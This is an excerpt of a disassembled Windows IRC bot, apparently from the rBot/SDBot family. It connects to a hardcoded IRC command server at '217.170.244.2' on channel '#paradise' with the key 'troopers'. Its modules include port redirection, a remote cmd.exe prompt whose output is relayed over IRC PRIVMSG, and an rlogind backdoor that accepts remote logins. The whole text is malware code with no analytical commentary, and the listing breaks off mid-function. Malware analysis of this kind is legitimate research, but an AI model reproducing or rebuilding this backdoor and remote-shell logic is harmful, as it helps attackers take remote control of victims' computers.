lea eax, [ebp+var_14]
push eax
call dword_43A338 ; InternetGetConnectedState
test eax, eax
jnz short loc_40FFBC
push 7530h
jmp short loc_40FFEA
; ---------------------------------------------------------------------------
loc_40FFBC: ; CODE XREF: sub_40FB4C+457�j
; sub_40FB4C+467�j
and dword_480AE0, 0
push offset dword_47FDF0
call sub_4096E9
cmp eax, 2
mov [ebp+var_8], eax
jz loc_410093
cmp dword_480AE0, 0
jz short loc_40FFE5
dec [ebp+var_4]
loc_40FFE5: ; CODE XREF: sub_40FB4C+494�j
push 0BB8h
loc_40FFEA: ; CODE XREF: sub_40FB4C+46E�j
call dword_422000 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 3
jl short loc_40FF9C
cmp [ebp+var_8], 2
jz loc_410093
cmp [ebp+var_C], 0
jz short loc_410046
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push ebx
call sub_416A00
mov eax, dword_42FCB0
push 3Fh
push offset aParadise ; "#paradise"
push edi
mov dword_47FF44, eax
call sub_416A00
push 3Fh
push offset aTroopers ; "troopers"
push esi
call sub_416A00
add esp, 24h
and [ebp+var_C], 0
jmp loc_40FF98
; ---------------------------------------------------------------------------
loc_410046: ; CODE XREF: sub_40FB4C+4BB�j
cmp byte_42FD28, 0
jz loc_40FF98
push 7Fh
push offset byte_42FD28
push ebx
call sub_416A00
mov eax, dword_42FCB4
push 3Fh
push offset dword_42FD34
push edi
mov dword_47FF44, eax
call sub_416A00
push 3Fh
push offset aTroopers_0 ; "troopers"
push esi
call sub_416A00
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40FF98
; ---------------------------------------------------------------------------
loc_410093: ; CODE XREF: sub_40FB4C+487�j
; sub_40FB4C+4B1�j
call sub_4138A3
loc_410098: ; CODE XREF: sub_40FB4C+A3�j
; sub_40FB4C+B0�j
call dword_43A4DC ; WSACleanup
loc_41009E: ; CODE XREF: sub_40FB4C+96�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40FB4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4100A7 proc near ; DATA XREF: sub_410142+12C�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_416B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov ebx, 1000h
jmp short loc_4100FC
; ---------------------------------------------------------------------------
loc_4100E1: ; CODE XREF: sub_4100A7+7B�j
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_43B26C[esi]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_410124
loc_4100FC: ; CODE XREF: sub_4100A7+38�j
xor eax, eax
push eax
lea edi, [ebp+var_1128]
mov ecx, 400h
rep stosd
push ebx
lea eax, [ebp+var_1128]
push eax
push dword_43B270[esi]
call dword_43A324 ; recv
test eax, eax
jg short loc_4100E1
loc_410124: ; CODE XREF: sub_4100A7+53�j
push dword_43B270[esi]
call dword_43A4D0 ; closesocket
push [ebp+var_14]
call sub_4139F6
pop ecx
push 0
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_4100A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_410142 proc near ; DATA XREF: sub_41031F+118�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_416B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_144]
rep movsd
mov esi, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], esi
call dword_43A3BC ; socket
xor ebx, ebx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_4102A1
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
mov [ebp+var_18], 2
call dword_43A514 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_43A434 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_4101CA
lea eax, [ebp+var_13C]
push eax
call dword_43A420 ; gethostbyname
jmp short loc_4101D8
; ---------------------------------------------------------------------------
loc_4101CA: ; CODE XREF: sub_410142+77�j
push 2
push 4
lea eax, [ebp+var_8]
push eax
call dword_43A4B4 ; gethostbyaddr
loc_4101D8: ; CODE XREF: sub_410142+86�j
cmp eax, ebx
jz loc_4102A1
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
push 10h
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz loc_4102A1
push [ebp+var_34]
movzx eax, [ebp+var_16]
push eax
push [ebp+var_14]
mov [ebp+var_20], ebx
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset aRedirectClient ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_416975
push [ebp+arg_0]
lea eax, [ebp+var_344]
push 11h
push eax
call sub_413732
imul esi, 234h
mov ecx, [ebp+var_34]
mov [ebp+var_30], eax
imul eax, 234h
mov dword_43B264[eax], ecx
add esp, 20h
lea esi, dword_43B26C[esi]
mov ecx, [esi]
mov dword_43B270[eax], ecx
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_144]
push eax
push offset sub_4100A7
push ebx
push ebx
call dword_42200C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_43B274[ecx], eax
jnz short loc_4102D7
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start connection "...
call sub_401F83
pop ecx
pop ecx
loc_4102A1: ; CODE XREF: sub_410142+42�j
; sub_410142+98�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_43B26C[eax]
call dword_43A4D0 ; closesocket
push [ebp+arg_0]
call dword_43A4D0 ; closesocket
push [ebp+var_4]
call sub_4139F6
pop ecx
push ebx
call dword_422014 ; ExitThread
loc_4102CF: ; CODE XREF: sub_410142+198�j
push 32h
call dword_422000 ; Sleep
loc_4102D7: ; CODE XREF: sub_410142+14A�j
cmp [ebp+var_20], ebx
jz short loc_4102CF
jmp short loc_4102F5
; ---------------------------------------------------------------------------
loc_4102DE: ; CODE XREF: sub_410142+1D9�j
push ebx
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4102A1
loc_4102F5: ; CODE XREF: sub_410142+19A�j
xor eax, eax
push ebx
lea edi, [ebp+var_1344]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+var_1344]
push eax
push dword ptr [esi]
call dword_43A324 ; recv
cmp eax, ebx
jg short loc_4102DE
jmp short loc_4102A1
sub_410142 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41031F proc near ; DATA XREF: sub_409848+2A72�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 4Ah
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push [ebp+var_40]
xor esi, esi
inc esi
mov [eax+120h], esi
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_43A514 ; ntohs
push 6
push esi
xor ebx, ebx
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], ebx
mov [ebp+arg_0], 10h
call dword_43A3BC ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41047E
mov eax, [ebp+var_3C]
imul eax, 234h
push esi
push 401h
push ebx
push edi
mov dword_43B26C[eax], edi
call dword_43A44C ; WSAAsyncSelect
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_43A49C ; bind
test eax, eax
jnz loc_41047E
push 0Ah
push edi
call dword_43A4E8 ; listen
test eax, eax
jnz loc_41047E
loc_4103C5: ; CODE XREF: sub_41031F+BA�j
; sub_41031F+15A�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_43A37C ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4103C5
push [ebp+var_3C]
movzx eax, [ebp+var_22]
push eax
push [ebp+var_20]
mov [ebp+var_148], esi
mov [ebp+var_2C], ebx
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_416975
push esi
lea eax, [ebp+var_34C]
push 11h
push eax
call sub_413732
mov ecx, [ebp+var_3C]
mov [ebp+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43B264[eax], ecx
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_14C]
push eax
push offset sub_410142
push ebx
push ebx
call dword_42200C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, ebx
mov dword_43B274[ecx], eax
jnz short loc_410474
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start client thre"...
call sub_401F83
pop ecx
pop ecx
jmp short loc_410481
; ---------------------------------------------------------------------------
loc_41046C: ; CODE XREF: sub_41031F+158�j
push 32h
call dword_422000 ; Sleep
loc_410474: ; CODE XREF: sub_41031F+136�j
cmp [ebp+var_2C], ebx
jz short loc_41046C
jmp loc_4103C5
; ---------------------------------------------------------------------------
loc_41047E: ; CODE XREF: sub_41031F+5D�j
; sub_41031F+8F�j ...
mov esi, [ebp+arg_0]
loc_410481: ; CODE XREF: sub_41031F+14B�j
push esi
call dword_43A4D0 ; closesocket
push edi
call dword_43A4D0 ; closesocket
push [ebp+var_3C]
call sub_4139F6
pop ecx
push ebx
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_41031F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4104A0 proc near ; CODE XREF: sub_4104D0+30�p
; sub_41050E+85�p ...
mov eax, dword_480AF4
cmp eax, 0FFFFFFFFh
push esi
mov esi, dword_42202C
jz short loc_4104B4
push eax
call esi ; CloseHandle
loc_4104B4: ; CODE XREF: sub_4104A0+F�j
mov eax, dword_480AF0
cmp eax, 0FFFFFFFFh
jz short loc_4104C1
push eax
call esi ; CloseHandle
loc_4104C1: ; CODE XREF: sub_4104A0+1C�j
mov eax, dword_480B2C
cmp eax, 0FFFFFFFFh
jz short loc_4104CE
push eax
call esi ; CloseHandle
loc_4104CE: ; CODE XREF: sub_4104A0+29�j
pop esi
retn
sub_4104A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104D0 proc near ; CODE XREF: sub_409848+3D95�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_4104DA: ; CODE XREF: sub_4104D0+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4104DA
push 0
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push dword_480AE8
call dword_422030 ; WriteFile
test eax, eax
jnz short loc_410509
call sub_4104A0
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_410509: ; CODE XREF: sub_4104D0+2E�j
xor eax, eax
inc eax
leave
retn
sub_4104D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41050E proc near ; CODE XREF: sub_41059C+D9�p
; sub_41059C+11F�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
inc ecx
mov edi, 422B02h
xor eax, eax
repe cmpsb
pop edi
pop esi
jz short loc_410553
push 0FAh
call dword_422000 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_416975
add esp, 10h
jmp short loc_41056A
; ---------------------------------------------------------------------------
loc_410553: ; CODE XREF: sub_41050E+1C�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_2 ; "%s"
push eax
call sub_416975
add esp, 0Ch
loc_41056A: ; CODE XREF: sub_41050E+43�j
lea eax, [ebp+var_200]
lea edx, [eax+1]
loc_410573: ; CODE XREF: sub_41050E+6A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410573
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43A458 ; send
test eax, eax
jg short loc_410598
call sub_4104A0
loc_410598: ; CODE XREF: sub_41050E+83�j
xor eax, eax
leave
retn
sub_41050E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41059C proc near ; DATA XREF: sub_410729+16A�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor eax, eax
mov ebx, 80h
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
xor edi, edi
push edi
push edi
lea eax, [ebp+var_4]
push eax
mov esi, 200h
push esi
lea eax, [ebp+var_20C]
push eax
push dword_480AF4
call dword_42210C ; PeekNamedPipe
test eax, eax
jz loc_4106AB
jmp short loc_4105E6
; ---------------------------------------------------------------------------
loc_4105E4: ; CODE XREF: sub_41059C+109�j
xor edi, edi
loc_4105E6: ; CODE XREF: sub_41059C+46�j
cmp [ebp+var_4], edi
jnz short loc_410616
lea eax, [ebp+var_8]
push eax
push dword_480B2C
call dword_422108 ; GetExitCodeProcess
test eax, eax
jz short loc_41060C
cmp [ebp+var_8], 103h
jnz loc_4106D8
loc_41060C: ; CODE XREF: sub_41059C+61�j
push 0Ah
call dword_422000 ; Sleep
jmp short loc_41067D
; ---------------------------------------------------------------------------
loc_410616: ; CODE XREF: sub_41059C+4D�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_410631
loc_41061D: ; CODE XREF: sub_41059C+93�j
cmp [ebp+eax+var_20C], 0Ah
jz loc_4106CF
inc eax
cmp eax, [ebp+var_4]
jb short loc_41061D
loc_410631: ; CODE XREF: sub_41059C+7F�j
mov [ebp+var_4], esi
loc_410634: ; CODE XREF: sub_41059C+137�j
xor eax, eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_480AF4
call dword_42208C ; ReadFile
test eax, eax
jz loc_410700
lea eax, [ebp+var_20C]
push eax
push offset dword_480AF8
push dword_480AEC
call sub_41050E
add esp, 0Ch
loc_41067D: ; CODE XREF: sub_41059C+78�j
xor eax, eax
push eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_20C]
push eax
push dword_480AF4
call dword_42210C ; PeekNamedPipe
test eax, eax
jnz loc_4105E4
loc_4106AB: ; CODE XREF: sub_41059C+40�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push offset dword_480AF8
push dword_480AEC
call sub_41050E
push [ebp+arg_0]
call sub_4139F6
add esp, 10h
push 1
jmp short loc_410722
; ---------------------------------------------------------------------------
loc_4106CF: ; CODE XREF: sub_41059C+89�j
inc eax
mov [ebp+var_4], eax
jmp loc_410634
; ---------------------------------------------------------------------------
loc_4106D8: ; CODE XREF: sub_41059C+6A�j
call sub_4104A0
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push offset dword_480AF8
push dword_480AEC
call sub_41050E
push [ebp+arg_0]
call sub_4139F6
add esp, 10h
push edi
jmp short loc_410722
; ---------------------------------------------------------------------------
loc_410700: ; CODE XREF: sub_41059C+C1�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push offset dword_480AF8
push dword_480AEC
call sub_41050E
push [ebp+arg_0]
call sub_4139F6
add esp, 10h
push 0
loc_410722: ; CODE XREF: sub_41059C+131�j
; sub_41059C+162�j
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_41059C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410729 proc near ; CODE XREF: sub_409848+4C83�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_4104A0
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_43A3DC ; SearchPathA
test eax, eax
jnz short loc_410760
or eax, 0FFFFFFFFh
jmp loc_4108D5
; ---------------------------------------------------------------------------
loc_410760: ; CODE XREF: sub_410729+2D�j
push ebx
push edi
mov edi, dword_422114
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jnz short loc_410793
loc_41078B: ; CODE XREF: sub_410729+7B�j
; sub_410729+9D�j ...
or eax, 0FFFFFFFFh
jmp loc_4108D3
; ---------------------------------------------------------------------------
loc_410793: ; CODE XREF: sub_410729+60�j
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz short loc_41078B
mov edi, dword_4220E0
push 3
push esi
push esi
push offset dword_480AE8
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call dword_422110 ; DuplicateHandle
test eax, eax
jz short loc_41078B
xor eax, eax
lea edi, [ebp+var_2C]
stosd
stosd
stosd
push 11h
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov eax, [ebp+var_4]
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, 422B02h
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], 44h
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call dword_422044 ; CreateProcessA
test eax, eax
jz loc_41078B
push [ebp+var_4]
mov edi, dword_42202C
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_480AF4, eax
mov eax, [ebp+var_8]
mov dword_480AF0, eax
mov eax, [ebp+var_2C]
mov dword_480B2C, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_480AEC, eax
jz short loc_41085F
push [ebp+arg_4]
jmp short loc_410860
; ---------------------------------------------------------------------------
loc_41085F: ; CODE XREF: sub_410729+12F�j
push ebx
loc_410860: ; CODE XREF: sub_410729+134�j
push offset dword_480AF8
call sub_416975
pop ecx
pop ecx
push esi
push 8
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_413732
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_43B268[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_41059C
push esi
push esi
call dword_42200C ; CreateThread
cmp eax, esi
mov dword_43B274[edi], eax
jnz short loc_4108D1
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_416975
lea eax, [ebp+var_378]
push eax
call sub_401F0F
add esp, 10h
loc_4108D1: ; CODE XREF: sub_410729+17F�j
xor eax, eax
loc_4108D3: ; CODE XREF: sub_410729+65�j
pop edi
pop ebx
loc_4108D5: ; CODE XREF: sub_410729+32�j
pop esi
leave
retn
sub_410729 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108D8 proc near ; CODE XREF: sub_410970+A6�p
; sub_410970+B6�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_4108DF: ; CODE XREF: sub_4108D8+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_43A324 ; recv
cmp eax, 1
jnz short loc_410915
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_41090A
test al, al
jnz short loc_4108DF
xor eax, eax
inc eax
loc_410907: ; CODE XREF: sub_4108D8+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41090A: ; CODE XREF: sub_4108D8+26�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_401F83
pop ecx
loc_410915: ; CODE XREF: sub_4108D8+1B�j
xor eax, eax
jmp short loc_410907
sub_4108D8 endp
; =============== S U B R O U T I N E =======================================
sub_410919 proc near ; DATA XREF: sub_410B7C+5A�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_410919 endp
; =============== S U B R O U T I N E =======================================
sub_410923 proc near ; CODE XREF: sub_410970+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_410928: ; CODE XREF: sub_410923+21�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_41094A
test cl, cl
jz short loc_410946
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_41094A
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_410928
loc_410946: ; CODE XREF: sub_410923+F�j
xor eax, eax
jmp short loc_41094F
; ---------------------------------------------------------------------------
loc_41094A: ; CODE XREF: sub_410923+B�j
; sub_410923+19�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_41094F: ; CODE XREF: sub_410923+25�j
test eax, eax
pop esi
jz short loc_41096C
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_401F83
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41096C: ; CODE XREF: sub_410923+2F�j
xor eax, eax
inc eax
retn
sub_410923 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410970 proc near ; DATA XREF: sub_410B7C+19F�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+1DCh], edi
mov eax, dword_43B26C[esi]
mov [ebp+74h+var_1F0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_1F4]
push eax
push ebx
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_1F4], edi
call dword_43A468 ; select
test eax, eax
jnz short loc_4109F9
push dword_43B26C[esi]
call dword_43A4D0 ; closesocket
push [ebp+74h+var_208]
loc_4109EE: ; CODE XREF: sub_410970+1A2�j
call sub_4139F6
pop ecx
jmp loc_410B74
; ---------------------------------------------------------------------------
loc_4109F9: ; CODE XREF: sub_410970+6A�j
push ebx
push edi
lea eax, [ebp+74h+var_3C]
push eax
push dword_43B26C[esi]
call dword_43A324 ; recv
push 10h
push dword_43B26C[esi]
lea eax, [ebp+74h+var_2C]
call sub_4108D8
push 10h
push dword_43B26C[esi]
lea eax, [ebp+74h+var_4C]
call sub_4108D8
push 40h
push dword_43B26C[esi]
lea eax, [ebp+74h+var_F0]
call sub_4108D8
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_1C]
push eax
push dword_43B26C[esi]
mov [ebp+74h+var_4], 10h
call dword_43A400 ; getpeername
test eax, eax
jz short loc_410A81
call dword_43A47C ; WSAGetLastError
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_401F83
push [ebp+74h+var_208]
call sub_4139F6
add esp, 0Ch
jmp loc_410B74
; ---------------------------------------------------------------------------
loc_410A81: ; CODE XREF: sub_410970+EB�j
push 2
push 4
lea eax, [ebp+74h+var_18]
push eax
call dword_43A4B4 ; gethostbyaddr
cmp eax, ebx
jnz short loc_410AAA
push [ebp+74h+var_18]
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_B0]
push eax
call sub_416975
pop ecx
pop ecx
jmp short loc_410AB9
; ---------------------------------------------------------------------------
loc_410AAA: ; CODE XREF: sub_410970+121�j
mov ecx, [eax]
lea edx, [ebp+74h+var_B0]
loc_410AAF: ; CODE XREF: sub_410970+147�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_410AAF
loc_410AB9: ; CODE XREF: sub_410970+138�j
push ebx
push edi
push 422B02h
push dword_43B26C[esi]
call dword_43A458 ; send
cmp dword_480B34, ebx
jnz short loc_410B17
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_350]
call sub_410923
add esp, 0Ch
test eax, eax
jnz short loc_410B17
push ebx
push 13h
push offset aPermissionDeni ; "Permission denied\n"
lea esi, dword_43B26C[esi]
push dword ptr [esi]
call dword_43A458 ; send
push dword ptr [esi]
call dword_43A4D0 ; closesocket
push [ebp+74h+arg_0]
jmp loc_4109EE
; ---------------------------------------------------------------------------
loc_410B17: ; CODE XREF: sub_410970+162�j
; sub_410970+17F�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_401F83
push [ebp+74h+arg_0]
call sub_411D59
add esp, 10h
test eax, eax
jnz short loc_410B57
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_401F83
push [ebp+74h+arg_0]
call sub_4139F6
add esp, 0Ch
push edi
jmp short loc_410B75
; ---------------------------------------------------------------------------
loc_410B57: ; CODE XREF: sub_410970+1C6�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_401F83
push [ebp+74h+arg_0]
call sub_4139F6
add esp, 10h
loc_410B74: ; CODE XREF: sub_410970+84�j
; sub_410970+10C�j
push ebx
loc_410B75: ; CODE XREF: sub_410970+1E5�j
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_410970 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B7C proc near ; DATA XREF: sub_409848+4B42�o
var_5A8 = byte ptr -5A8h
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
